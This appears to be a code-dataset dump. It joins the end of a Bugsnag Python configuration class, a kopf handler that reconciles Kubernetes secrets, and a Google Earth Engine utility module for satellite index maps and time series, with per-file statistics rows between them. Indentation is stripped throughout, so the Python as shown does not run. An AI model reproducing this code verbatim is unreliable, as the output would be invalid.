The host name of the application server. This value is automatically
detected for Heroku applications and included in event device metadata.
"""
return self._hostname
@hostname.setter # type: ignore
@validate_str_setter
def hostname(self, value: str):
self._hostname = value
@property
def ignore_classes(self):
"""
Fully qualified class names which should be ignored when capturing
uncaught exceptions and other events. KeyboardInterrupt and Http404
exceptions are ignored by default.
"""
return self._ignore_classes
@ignore_classes.setter # type: ignore
@validate_iterable_setter
def ignore_classes(self, value: Union[List[str], Tuple[str]]):
self._ignore_classes = value
@property
def lib_root(self):
"""
The path to the Python library. Any traceback frame which contains
lib_root as a prefix is considered out-of-project. The prefix is also
stripped to make file names easier to read.
"""
return self._lib_root
@lib_root.setter # type: ignore
@validate_str_setter
def lib_root(self, value: str):
self._lib_root = value
@property
def notify_release_stages(self):
"""
A list of release_stage values which are permitted to capture and send
events and sessions. By default this value is None and all events and
sessions are delivered.
"""
return self._notify_release_stages
@notify_release_stages.setter # type: ignore
@validate_iterable_setter
def notify_release_stages(self, value: List[str]):
self._notify_release_stages = value
@property
def params_filters(self):
"""
A list of filters applied to event metadata to prevent the values from
being sent in events. By default the following keys are filtered:
* authorization
* cookie
* password
* password_confirmation
"""
return self._params_filters
@params_filters.setter # type: ignore
@validate_iterable_setter
def params_filters(self, value: List[str]):
self._params_filters = value
@property
def project_root(self):
"""
The working directory containing the application source code.
Traceback file paths which contain this prefix are considered a part of
the project. This prefix is also stripped to increase file name
readability in traceback lines.
"""
return self._project_root
@project_root.setter # type: ignore
@validate_str_setter
def project_root(self, value: str):
self._project_root = value
@property
def proxy_host(self):
"""
The host name of the proxy to use to deliver requests, if any
"""
return self._proxy_host
@proxy_host.setter # type: ignore
@validate_str_setter
def proxy_host(self, value: str):
self._proxy_host = value
@property
def release_stage(self):
"""
The development phase of the deployed application. This value is used
to differentiate events which occur in production vs development or
staging environments.
"""
return self._release_stage
@release_stage.setter # type: ignore
@validate_str_setter
def release_stage(self, value: str):
self._release_stage = value
@property
def send_code(self):
"""
If the source code lines immediately surrounding traceback locations
should be sent with events
"""
return self._send_code
@send_code.setter # type: ignore
@validate_bool_setter
def send_code(self, value: bool):
self._send_code = value
@property
def send_environment(self):
"""
If the request environment should be automatically collected and
attached to events
"""
return self._send_environment
@send_environment.setter # type: ignore
@validate_bool_setter
def send_environment(self, value: bool):
self._send_environment = value
@property
def session_endpoint(self):
"""
Sessions API endpoint. Set this property if using Bugsnag On-Premise.
>>> config = Configuration()
>>> config.session_endpoint = 'https://sessions.bugsnag.example.co'
"""
return self._session_endpoint
@session_endpoint.setter # type: ignore
@validate_required_str_setter
def session_endpoint(self, value: str):
self._session_endpoint = value
@property
def traceback_exclude_modules(self):
"""
Modules which should be stripped from event tracebacks entirely
"""
return self._traceback_exclude_modules
@traceback_exclude_modules.setter # type: ignore
@validate_iterable_setter
def traceback_exclude_modules(self, value: List[str]):
self._traceback_exclude_modules = value
def should_notify(self) -> bool:
return self.notify_release_stages is None or \
(isinstance(self.notify_release_stages, (tuple, list)) and
self.release_stage in self.notify_release_stages)
def should_ignore(self, exception: BaseException) -> bool:
return self.ignore_classes is not None and \
fully_qualified_class_name(exception) in self.ignore_classes
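# Editor's note: a short sketch of how the two predicates above behave,
# using placeholder values:
#
#     config = Configuration()
#     config.configure(release_stage="development",
#                      notify_release_stages=["production"])
#     config.should_notify()                     # False: stage not permitted
#     config.should_ignore(KeyboardInterrupt())  # True: in default ignore_classes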
class RequestConfiguration:
"""
Per-request Bugsnag configuration settings.
"""
@classmethod
def get_instance(cls):
"""
Get this thread's instance of the RequestConfiguration.
"""
try:
instance = _request_info.get()
except LookupError:
instance = None
if instance is None:
instance = RequestConfiguration()
_request_info.set(instance) # type: ignore
return instance
@classmethod
def clear(cls):
"""
Clear this thread's instance of the RequestConfiguration.
"""
_request_info.set(None)
def __init__(self):
self.context = None
self.grouping_hash = None
self.user = {}
self.metadata = {}
# legacy fields
self.user_id = None
self.extra_data = {}
self.request_data = {}
self.environment_data = {}
self.session_data = {}
def get(self, name) -> Any:
"""
Get a single configuration option
"""
return getattr(self, name)
def configure(self, **options):
"""
Set one or more configuration settings.
"""
for name, value in options.items():
setattr(self, name, value)
return self
@property
def meta_data(self) -> Any:
warnings.warn('RequestConfiguration.meta_data has been renamed to ' +
'"metadata"', DeprecationWarning)
return self.metadata
| 31.695021
| 99
| 0.636185
| 1,714
| 15,277
| 5.456243
| 0.163944
| 0.023952
| 0.02021
| 0.027802
| 0.313195
| 0.155796
| 0.13719
| 0.066082
| 0.026946
| 0.015825
| 0
| 0.001204
| 0.292989
| 15,277
| 481
| 100
| 31.760915
| 0.864642
| 0.199057
| 0
| 0.173913
| 0
| 0
| 0.044747
| 0.008791
| 0
| 0
| 0
| 0
| 0
| 1
| 0.170569
| false
| 0.003344
| 0.046823
| 0.006689
| 0.317726
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e7f6433ef2aafee2885217cc2a65201e60c31e
| 587
|
py
|
Python
|
secret_injector/secret.py
|
failk8s/failk8s-operator
|
457890a09a2551b9002eec73386b11a37469569f
|
[
"Apache-2.0"
] | null | null | null |
secret_injector/secret.py
|
failk8s/failk8s-operator
|
457890a09a2551b9002eec73386b11a37469569f
|
[
"Apache-2.0"
] | null | null | null |
secret_injector/secret.py
|
failk8s/failk8s-operator
|
457890a09a2551b9002eec73386b11a37469569f
|
[
"Apache-2.0"
] | null | null | null |
import kopf
from .functions import global_logger, reconcile_secret
@kopf.on.event("", "v1", "secrets")
def injector_secret_event(type, event, logger, **_):
obj = event["object"]
namespace = obj["metadata"]["namespace"]
name = obj["metadata"]["name"]
# If the secret already exists (indicated by the event type being None),
# or the secret is added or modified later, do a full reconciliation to
# ensure that any new match will inject the secret.
with global_logger(logger):
if type in (None, "ADDED", "MODIFIED"):
reconcile_secret(name, namespace, obj)
| 30.894737
| 67
| 0.67632
| 77
| 587
| 5.064935
| 0.597403
| 0.061538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002146
| 0.206133
| 587
| 18
| 68
| 32.611111
| 0.834764
| 0.289608
| 0
| 0
| 0
| 0
| 0.138015
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5e86c6edc684a9da3a98d63325e3f3c6ab77abb
| 25,390
|
py
|
Python
|
src/py/gee/utils.py
|
openforis/collectearthonline
|
1af48e373c393a1d8c48b17472f6aa6c41f65769
|
[
"MIT"
] | null | null | null |
src/py/gee/utils.py
|
openforis/collectearthonline
|
1af48e373c393a1d8c48b17472f6aa6c41f65769
|
[
"MIT"
] | null | null | null |
src/py/gee/utils.py
|
openforis/collectearthonline
|
1af48e373c393a1d8c48b17472f6aa6c41f65769
|
[
"MIT"
] | null | null | null |
import datetime
import os
import ee
import math
import sys
import json
from ee.ee_exception import EEException
from gee.inputs import getLandsat, getS1
########## Helper functions ##########
def initialize(ee_account='', ee_key_path=''):
try:
if ee_account and ee_key_path and os.path.exists(ee_key_path):
credentials = ee.ServiceAccountCredentials(ee_account, ee_key_path)
ee.Initialize(credentials)
else:
ee.Initialize()
except Exception as e:
print(e)
def getReducer(reducer):
reducerName = reducer.lower()
if(reducerName == 'min'):
return ee.Reducer.min()
elif (reducerName == 'max'):
return ee.Reducer.max()
elif (reducerName == 'mean'):
return ee.Reducer.mean()
elif (reducerName == 'mode'):
return ee.Reducer.mode()
elif (reducerName == 'first'):
return ee.Reducer.first()
elif (reducerName == 'last'):
return ee.Reducer.last()
elif (reducerName == 'sum'):
return ee.Reducer.sum()
else:
return ee.Reducer.median()
def reduceIC(imageCollection, reducer):
reducerName = reducer.lower()
if(reducerName == 'min'):
return imageCollection.min()
elif (reducerName == 'max'):
return imageCollection.max()
elif (reducerName == 'mean'):
return imageCollection.mean()
elif (reducerName == 'mode'):
return imageCollection.mode()
elif (reducerName == 'mosaic'):
return imageCollection.mosaic()
elif (reducerName == 'first'):
return imageCollection.first()
elif (reducerName == 'sum'):
return imageCollection.sum()
else:
return imageCollection.median()
def safeParseJSON(val):
if isinstance(val, dict):
return val
else:
try:
return json.loads(val)
except Exception as e:
try:
return json.loads(val.replace("'", "\""))
except Exception as e:
return {}
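# Editor's note: safeParseJSON accepts dicts, JSON strings and, as a
# fallback, Python-style single-quoted strings; anything else yields {}.
#
#     safeParseJSON({'a': 1})      # -> {'a': 1}, passed through
#     safeParseJSON('{"a": 1}')    # -> {'a': 1}
#     safeParseJSON("{'a': 1}")    # -> {'a': 1}, via the quote-replacement fallback
#     safeParseJSON("not json")    # -> {}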
########## Helper routes ##########
def listAvailableBands(name, assetType):
eeImage = None
if assetType == "imageCollection":
eeImage = ee.ImageCollection(name).first()
else:
eeImage = ee.Image(name)
return {
'bands': eeImage.bandNames().getInfo(),
'imageName': name
}
########## ee.Image ##########
def imageToMapId(image, visParams):
eeImage = ee.Image(image)
mapId = eeImage.getMapId(visParams)
# TODO: just return the URL so it is easier to deduce what the routes return.
return {
'url': mapId['tile_fetcher'].url_format
}
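# Editor's note: a usage sketch, assuming ee.Initialize() has already run;
# the asset id and visParams below are illustrative placeholders:
#
#     tile = imageToMapId('USGS/SRTMGL1_003',
#                         {'min': 0, 'max': 3000, 'palette': '000000,ffffff'})
#     tile['url']  # XYZ tile URL template for a web map client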
########## ee.ImageCollection ##########
def imageCollectionToMapId(assetId, visParams, reducer, startDate, endDate):
eeCollection = ee.ImageCollection(assetId)
if (startDate and endDate):
eeFilterDate = ee.Filter.date(startDate, endDate)
eeCollection = eeCollection.filter(eeFilterDate)
reducedImage = ee.Image(reduceIC(eeCollection, reducer))
return imageToMapId(reducedImage, visParams)
# TODO: should we allow the user to select the first cloud-free image again?
def firstCloudFreeImageInMosaicToMapId(assetId, visParams, startDate, endDate):
skipCloudMask = False
eeCollection = ee.ImageCollection(assetId)
lowerAsset = assetId.lower()
if("b2" not in visParams["bands"].lower()):
skipCloudMask = True
elif ("lc8" in lowerAsset):
skipCloudMask = False
elif ("le7" in lowerAsset):
skipCloudMask = False
elif ("lt5" in lowerAsset):
skipCloudMask = False
else:
skipCloudMask = True
if (startDate and endDate):
eeFilterDate = ee.Filter.date(startDate, endDate)
eeCollection = eeCollection.filter(eeFilterDate)
eeFirstImage = ee.Image(eeCollection.mosaic())
try:
if not skipCloudMask:
sID = ''
if ("lc8" in lowerAsset):
sID = 'OLI_TIRS'
elif ("le7" in lowerAsset):
sID = 'ETM'
elif ("lt5" in lowerAsset):
sID = 'TM'
scored = ee.Algorithms.Landsat.simpleCloudScore(
eeFirstImage.set('SENSOR_ID', sID))
mask = scored.select(['cloud']).lte(20)
masked = eeFirstImage.updateMask(mask)
values = imageToMapId(masked, visParams)
else:
values = imageToMapId(eeFirstImage, visParams)
except EEException:
# fall back to the unmasked mosaic if cloud scoring fails
values = imageToMapId(eeFirstImage, visParams)
return values
########## ee.FeatureCollection ##########
def getFeatureCollectionTileUrl(featureCollection, field, matchID, visParams):
fc = ee.FeatureCollection(featureCollection)
single = fc.filter(ee.Filter.equals(field, matchID))
mapId = ee.Image().paint(single, 0, 2).getMapId(visParams)
return mapId['tile_fetcher'].url_format
########## Pre defined ee.ImageCollection ##########
# Index Image Collection
def lsMaskClouds(img, cloudThresh=10):
score = ee.Image(1.0)
# Clouds are reasonably bright in the blue band.
blue_rescale = img.select('blue').subtract(ee.Number(0.1)).divide(
ee.Number(0.3).subtract(ee.Number(0.1)))
score = score.min(blue_rescale)
# Clouds are reasonably bright in all visible bands.
visible = img.select('red').add(
img.select('green')).add(img.select('blue'))
visible_rescale = visible.subtract(ee.Number(0.2)).divide(
ee.Number(0.8).subtract(ee.Number(0.2)))
score = score.min(visible_rescale)
# Clouds are reasonably bright in all infrared bands.
infrared = img.select('nir').add(
img.select('swir1')).add(img.select('swir2'))
infrared_rescale = infrared.subtract(ee.Number(0.3)).divide(
ee.Number(0.8).subtract(ee.Number(0.3)))
score = score.min(infrared_rescale)
# Clouds are reasonably cool in temperature.
temp_rescale = img.select('temp').subtract(ee.Number(300)).divide(
ee.Number(290).subtract(ee.Number(300)))
score = score.min(temp_rescale)
# However, clouds are not snow.
ndsi = img.normalizedDifference(['green', 'swir1'])
ndsi_rescale = ndsi.subtract(ee.Number(0.8)).divide(
ee.Number(0.6).subtract(ee.Number(0.8)))
score = score.min(ndsi_rescale).multiply(100).byte()
mask = score.lt(cloudThresh).rename(['cloudMask'])
img = img.updateMask(mask)
return img.addBands(score)
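# Editor's note: every score.min(...) step above applies the same linear
# rescale (x - lo) / (hi - lo) before taking the running minimum. A
# plain-Python sketch of that formula:
#
#     def rescale(x, lo, hi):
#         return (x - lo) / (hi - lo)
#
#     rescale(0.2, 0.1, 0.3)  # -> 0.5, halfway between the two thresholds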
def s2MaskClouds(img):
qa = img.select('QA60')
# Bits 10 and 11 are clouds and cirrus, respectively.
cloudBitMask = int(math.pow(2, 10))
cirrusBitMask = int(math.pow(2, 11))
# clear if both flags set to zero.
clear = qa.bitwiseAnd(cloudBitMask).eq(0).And(
qa.bitwiseAnd(cirrusBitMask).eq(0))
return img.divide(10000).updateMask(clear).set('system:time_start', img.get('system:time_start'))
def bandPassAdjustment(img):
keep = img.select(['temp'])
bands = ['blue', 'green', 'red', 'nir', 'swir1', 'swir2']
# linear regression coefficients for adjustment
gain = ee.Array([[0.977], [1.005], [0.982], [1.001], [1.001], [0.996]])
bias = ee.Array([[-0.00411], [-0.00093], [0.00094],
[-0.00029], [-0.00015], [-0.00097]])
# Make an Array Image, with a 2-D Array per pixel.
arrayImage2D = img.select(bands).toArray().toArray(1)
# apply correction factors and reproject array to geographic image
componentsImage = ee.Image(gain).multiply(arrayImage2D).add(ee.Image(bias)) \
.arrayProject([0]).arrayFlatten([bands]).float()
# .set('system:time_start',img.get('system:time_start'));
return keep.addBands(componentsImage)
def getLandSatMergedCollection():
sensorBandDictLandsatTOA = {'L8': [1, 2, 3, 4, 5, 9, 6],
'L7': [0, 1, 2, 3, 4, 5, 7],
'L5': [0, 1, 2, 3, 4, 5, 6],
'L4': [0, 1, 2, 3, 4, 5, 6],
'S2': [1, 2, 3, 7, 11, 10, 12]}
bandNamesLandsatTOA = ['blue', 'green',
'red', 'nir', 'swir1', 'temp', 'swir2']
metadataCloudCoverMax = 100
lt4 = ee.ImageCollection('LANDSAT/LT4_L1T_TOA') \
.filterMetadata('CLOUD_COVER', 'less_than', metadataCloudCoverMax) \
.select(sensorBandDictLandsatTOA['L4'], bandNamesLandsatTOA).map(lsMaskClouds)
lt5 = ee.ImageCollection('LANDSAT/LT5_L1T_TOA') \
.filterMetadata('CLOUD_COVER', 'less_than', metadataCloudCoverMax) \
.select(sensorBandDictLandsatTOA['L5'], bandNamesLandsatTOA).map(lsMaskClouds)
le7 = ee.ImageCollection('LANDSAT/LE7_L1T_TOA') \
.filterMetadata('CLOUD_COVER', 'less_than', metadataCloudCoverMax) \
.select(sensorBandDictLandsatTOA['L7'], bandNamesLandsatTOA).map(lsMaskClouds)
lc8 = ee.ImageCollection('LANDSAT/LC08/C01/T1_TOA') \
.filterMetadata('CLOUD_COVER', 'less_than', metadataCloudCoverMax) \
.select(sensorBandDictLandsatTOA['L8'], bandNamesLandsatTOA).map(lsMaskClouds)
s2 = ee.ImageCollection('COPERNICUS/S2') \
.filterMetadata('CLOUDY_PIXEL_PERCENTAGE', 'less_than', metadataCloudCoverMax) \
.map(s2MaskClouds).select(sensorBandDictLandsatTOA['S2'], bandNamesLandsatTOA) \
.map(bandPassAdjustment)
return ee.ImageCollection(lt4.merge(lt5).merge(le7).merge(lc8).merge(s2))
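# Editor's note: usage sketch; because every sensor is remapped to the
# shared band names ['blue', 'green', 'red', 'nir', 'swir1', 'temp',
# 'swir2'], downstream index math is sensor-agnostic:
#
#     merged = getLandSatMergedCollection().filterDate('2017-01-01', '2017-12-31')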
def filteredImageNDVIToMapId(startDate, endDate):
def calcNDVI(img):
return img.expression('(i.nir - i.red) / (i.nir + i.red)', {'i': img}).rename(['NDVI']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = 'c9c0bf,435ebf,eee8aa,006400'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcNDVI).mean())
return imageToMapId(eviImage, visParams)
def filteredImageEVIToMapId(startDate, endDate):
def calcEVI(img):
return img.expression('2.5 * (i.nir - i.red) / (i.nir + 6.0 * i.red - 7.5 * i.blue + 1)', {'i': img}).rename(['EVI']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = 'F5F5F5,E6D3C5,C48472,B9CF63,94BF3D,6BB037,42A333,00942C,008729,007824,004A16'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcEVI).mean())
return imageToMapId(eviImage, visParams)
def filteredImageEVI2ToMapId(startDate, endDate):
def calcEVI2(img):
return img.expression('2.5 * (i.nir - i.red) / (i.nir + 2.4 * i.red + 1)', {'i': img}).rename(['EVI2']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = 'F5F5F5,E6D3C5,C48472,B9CF63,94BF3D,6BB037,42A333,00942C,008729,007824,004A16'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcEVI2).mean())
return imageToMapId(eviImage, visParams)
def filteredImageNDMIToMapId(startDate, endDate):
def calcNDMI(img):
return img.expression('(i.nir - i.swir1) / (i.nir + i.swir1)', {'i': img}).rename(['NDMI']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = '0000FE,2E60FD,31B0FD,00FEFE,50FE00,DBFE66,FEFE00,FFBB00,FF6F00,FE0000'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcNDMI).mean())
return imageToMapId(eviImage, visParams)
def filteredImageNDWIToMapId(startDate, endDate):
def calcNDWI(img):
return img.expression('(i.green - i.nir) / (i.green + i.nir)', {'i': img}).rename(['NDWI']) \
.set('system:time_start', img.get('system:time_start'))
eeCollection = getLandSatMergedCollection().filterDate(startDate, endDate)
colorPalette = '505050,E8E8E8,00FF33,003300'
visParams = {'opacity': 1, 'max': 1,
'min': -1, 'palette': colorPalette}
eviImage = ee.Image(eeCollection.map(calcNDWI).mean())
return imageToMapId(eviImage, visParams)
def filteredImageByIndexToMapId(startDate, endDate, index):
lowerIndex = index.lower()
if (lowerIndex == 'ndvi'):
return filteredImageNDVIToMapId(startDate, endDate)
elif (lowerIndex == 'evi'):
return filteredImageEVIToMapId(startDate, endDate)
elif (lowerIndex == 'evi2'):
return filteredImageEVI2ToMapId(startDate, endDate)
elif (lowerIndex == 'ndmi'):
return filteredImageNDMIToMapId(startDate, endDate)
elif (lowerIndex == 'ndwi'):
return filteredImageNDWIToMapId(startDate, endDate)
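# Editor's note: index names not listed above fall through and return
# None. A usage sketch with placeholder dates:
#
#     filteredImageByIndexToMapId('2017-01-01', '2017-12-31', 'NDVI')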
def filteredImageCompositeToMapId(assetId, visParams, startDate, endDate, metadataCloudCoverMax, simpleCompositeVariable):
eeCollection = ee.ImageCollection(assetId)
if (startDate and endDate):
eeCollection = eeCollection.filterDate(startDate, endDate)
eeCollection = eeCollection.filterMetadata(
'CLOUD_COVER',
'less_than',
metadataCloudCoverMax
)
eeMosaicImage = ee.Algorithms.Landsat.simpleComposite(
eeCollection,
simpleCompositeVariable,
10,
40,
True
)
return imageToMapId(eeMosaicImage, visParams)
def filteredSentinelComposite(visParams, startDate, endDate, metadataCloudCoverMax):
def cloudScore(img):
def rescale(img, exp, thresholds):
return img.expression(exp, {'img': img}).subtract(thresholds[0]).divide(thresholds[1] - thresholds[0])
score = ee.Image(1.0)
score = score.min(rescale(img, 'img.B2', [0.1, 0.3]))
score = score.min(rescale(img, 'img.B4 + img.B3 + img.B2', [0.2, 0.8]))
score = score.min(
rescale(img, 'img.B8 + img.B11 + img.B12', [0.3, 0.8]))
ndsi = img.normalizedDifference(['B3', 'B11'])
return score.min(rescale(ndsi, 'img', [0.8, 0.6]))
def cloudScoreS2(img):
rescale = img.divide(10000)
score = cloudScore(rescale).multiply(100).rename('cloudscore')
return img.addBands(score)
sentinel2 = ee.ImageCollection('COPERNICUS/S2')
f2017s2 = sentinel2.filterDate(startDate, endDate).filterMetadata(
'CLOUDY_PIXEL_PERCENTAGE', 'less_than', metadataCloudCoverMax)
m2017s2 = f2017s2.map(cloudScoreS2)
m2017s3 = m2017s2.median()
return imageToMapId(m2017s3, visParams)
def filteredSentinelSARComposite(visParams, startDate, endDate):
def toNatural(img):
return ee.Image(10).pow(img.divide(10))
def addRatioBands(img):
# not using angle band
vv = img.select('VV')
vh = img.select('VH')
vv_vh = vv.divide(vh).rename('VV/VH')
vh_vv = vh.divide(vv).rename('VH/VV')
return vv.addBands(vh).addBands(vv_vh).addBands(vh_vv)
sentinel1 = ee.ImageCollection('COPERNICUS/S1_GRD')
sentinel1 = sentinel1.filterDate(startDate, endDate) \
.filter(ee.Filter.listContains('transmitterReceiverPolarisation', 'VV')) \
.filter(ee.Filter.listContains('transmitterReceiverPolarisation', 'VH')) \
.filter(ee.Filter.eq('instrumentMode', 'IW'))
sentinel1 = sentinel1.map(toNatural)
sentinel1 = sentinel1.map(addRatioBands)
median = sentinel1.median()
return imageToMapId(median, visParams)
########## Time Series ##########
def getTimeSeriesByCollectionAndIndex(assetId, indexName, scale, coords, startDate, endDate, reducer):
geometry = None
indexCollection = None
if isinstance(coords[0], list):
geometry = ee.Geometry.Polygon(coords)
else:
geometry = ee.Geometry.Point(coords)
if indexName is not None:
indexCollection = ee.ImageCollection(assetId).filterDate(
startDate, endDate).select(indexName)
else:
indexCollection = ee.ImageCollection(
assetId).filterDate(startDate, endDate)
def getIndex(image):
theReducer = getReducer(reducer)
if indexName is not None:
indexValue = image.reduceRegion(
theReducer, geometry, scale).get(indexName)
else:
indexValue = image.reduceRegion(theReducer, geometry, scale)
date = image.get('system:time_start')
indexImage = ee.Image().set(
'indexValue', [ee.Number(date), indexValue])
return indexImage
def getClipped(image):
return image.clip(geometry)
clippedcollection = indexCollection.map(getClipped)
indexCollection1 = clippedcollection.map(getIndex)
indexCollection2 = indexCollection1.aggregate_array('indexValue')
return indexCollection2.getInfo()
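# Editor's note: a usage sketch with placeholder values; coords may be a
# [lon, lat] point or a list of polygon ring coordinates:
#
#     getTimeSeriesByCollectionAndIndex('LANDSAT/LC08/C01/T1_TOA', 'B4', 30,
#                                       [-122.3, 37.8],
#                                       '2017-01-01', '2017-12-31', 'mean')
#
# The result is a list of [timestamp_ms, value] pairs.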
def getTimeSeriesByIndex(indexName, scale, coords, startDate, endDate, reducer):
bandsByCollection = {
'LANDSAT/LC08/C01/T1_TOA': ['B2', 'B3', 'B4', 'B5', 'B6', 'B7'],
'LANDSAT/LC08/C01/T2_TOA': ['B2', 'B3', 'B4', 'B5', 'B6', 'B7'],
'LANDSAT/LE07/C01/T1_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LE07/C01/T2_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LT05/C01/T1_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LT05/C01/T2_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LT04/C01/T1_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7'],
'LANDSAT/LT04/C01/T2_TOA': ['B1', 'B2', 'B3', 'B4', 'B5', 'B7']
}
indexes = {
'NDVI': '(nir - red) / (nir + red)',
'EVI': '2.5 * (nir - red) / (nir + 6.0 * red - 7.5 * blue + 1)',
'EVI2': '2.5 * (nir - red) / (nir + 2.4 * red + 1)',
'NDMI': '(nir - swir1) / (nir + swir1)',
'NDWI': '(green - nir) / (green + nir)',
'NBR': '(nir - swir2) / (nir + swir2)',
'LSAVI': '((nir - red) / (nir + red + 0.5)) * (1 + 0.5)'
}
def create(name):
def maskClouds(image):
def isSet(types):
""" https://landsat.usgs.gov/collectionqualityband """
typeByValue = {
'badPixels': 15,
'cloud': 16,
'shadow': 256,
'snow': 1024,
'cirrus': 4096
}
anySet = ee.Image(0)
for Type in types:
anySet = anySet.Or(image.select(
'BQA').bitwiseAnd(typeByValue[Type]).neq(0))
return anySet
return image.updateMask(isSet(['badPixels', 'cloud', 'shadow', 'cirrus']).Not())
def toIndex(image):
bands = bandsByCollection[name]
return image.expression(indexes[indexName], {
'blue': image.select(bands[0]),
'green': image.select(bands[1]),
'red': image.select(bands[2]),
'nir': image.select(bands[3]),
'swir1': image.select(bands[4]),
'swir2': image.select(bands[5]),
}).clamp(-1, 1).rename(['index'])
def toIndexWithTimeStart(image):
time = image.get('system:time_start')
image = maskClouds(image)
return toIndex(image).set('system:time_start', time)
#
if startDate and endDate:
return ee.ImageCollection(name).filterDate(startDate, endDate).filterBounds(geometry).map(toIndexWithTimeStart, True)
else:
return ee.ImageCollection(name).filterBounds(geometry).map(toIndexWithTimeStart, True)
def reduceRegion(image):
theReducer = getReducer(reducer)
reduced = image.reduceRegion(
theReducer, geometry=geometry, scale=scale, maxPixels=1e6)
return ee.Feature(None, {
'index': reduced.get('index'),
'timeIndex': [image.get('system:time_start'), reduced.get('index')]
})
geometry = None
if isinstance(coords[0], list) or isinstance(coords[0], tuple):
geometry = ee.Geometry.Polygon(coords)
else:
geometry = ee.Geometry.Point(coords)
collection = ee.ImageCollection([])
for name in bandsByCollection:
collection = collection.merge(create(name))
return ee.ImageCollection(ee.ImageCollection(collection).sort('system:time_start').distinct('system:time_start')) \
.map(reduceRegion) \
.filterMetadata('index', 'not_equals', None) \
.aggregate_array('timeIndex') \
.getInfo()
########## Degradation##########
def getDegradationTileUrlByDateS1(geometry, date, visParams):
imDate = datetime.datetime.strptime(date, "%Y-%m-%d")
befDate = imDate - datetime.timedelta(days=1)
aftDate = imDate + datetime.timedelta(days=1)
if isinstance(geometry[0], list):
geometry = ee.Geometry.Polygon(geometry)
else:
geometry = ee.Geometry.Point(geometry)
sentinel1Data = getS1({
"targetBands": ['VV', 'VH', 'VV/VH'],
'region': geometry})
start = befDate.strftime('%Y-%m-%d')
end = aftDate.strftime('%Y-%m-%d')
selectedImage = sentinel1Data.filterDate(start, end).first()
selectedImage = ee.Image(selectedImage)
mapparams = selectedImage.getMapId(visParams)
return mapparams['tile_fetcher'].url_format
def getDegradationPlotsByPointS1(geometry, start, end):
if isinstance(geometry[0], list):
geometry = ee.Geometry.Polygon(geometry)
else:
geometry = ee.Geometry.Point(geometry)
sentinel1Data = getS1({
"targetBands": ['VV', 'VH', 'VV/VH'],
'region': geometry
}).filterDate(start, end)
def myimageMapper(img):
theReducer = ee.Reducer.mean()
indexValue = img.reduceRegion(theReducer, geometry, 30)
date = img.get('system:time_start')
visParams = {'bands': ['VV', 'VH', 'ratioVVVH'],
'min': [-15, -25, .40], 'max': [0, -10, 1], 'gamma': 1.6}
indexImage = ee.Image().set(
'indexValue', [ee.Number(date), indexValue])
return indexImage
lsd = sentinel1Data.map(myimageMapper, True)
indexCollection2 = lsd.aggregate_array('indexValue')
values = indexCollection2.getInfo()
return values
def getDegradationTileUrlByDate(geometry, date, visParams):
imDate = datetime.datetime.strptime(date, "%Y-%m-%d")
startDate = imDate - datetime.timedelta(days=1)
endDate = imDate + datetime.timedelta(days=1)
if isinstance(geometry[0], list):
geometry = ee.Geometry.Polygon(geometry)
else:
geometry = ee.Geometry.Point(geometry)
landsatData = getLandsat({
"start": startDate.strftime('%Y-%m-%d'),
"end": endDate.strftime('%Y-%m-%d'),
"targetBands": ['RED', 'GREEN', 'BLUE', 'SWIR1', 'NIR'],
"region": geometry,
"sensors": {"l4": False, "l5": False, "l7": False, "l8": True}
})
selectedImage = landsatData.first()
unmasked = ee.Image(selectedImage).multiply(10000).toInt16().unmask()
mapparams = unmasked.getMapId(visParams)
return mapparams['tile_fetcher'].url_format
def getDegradationPlotsByPoint(geometry, start, end, band):
if isinstance(geometry[0], list):
geometry = ee.Geometry.Polygon(geometry)
else:
geometry = ee.Geometry.Point(geometry)
landsatData = getLandsat({
"start": start,
"end": end,
"targetBands": [band],
"region": geometry,
"sensors": {"l4": True, "l5": True, "l7": True, "l8": True}
})
def myImageMapper(img):
theReducer = ee.Reducer.mean()
indexValue = img.reduceRegion(theReducer, geometry, 30)
date = img.get('system:time_start')
indexImage = ee.Image().set(
'indexValue',
[ee.Number(date), indexValue]
)
return indexImage
lsd = landsatData.map(myImageMapper, True)
indexCollection2 = lsd.aggregate_array('indexValue')
values = indexCollection2.getInfo()
return values
########## Stats ##########
def getStatistics(extent):
extentGeom = ee.Geometry.Polygon(extent)
elev = ee.Image('USGS/GTOPO30')
minmaxElev = elev.reduceRegion(
ee.Reducer.minMax(), extentGeom, 1000, maxPixels=500000000)
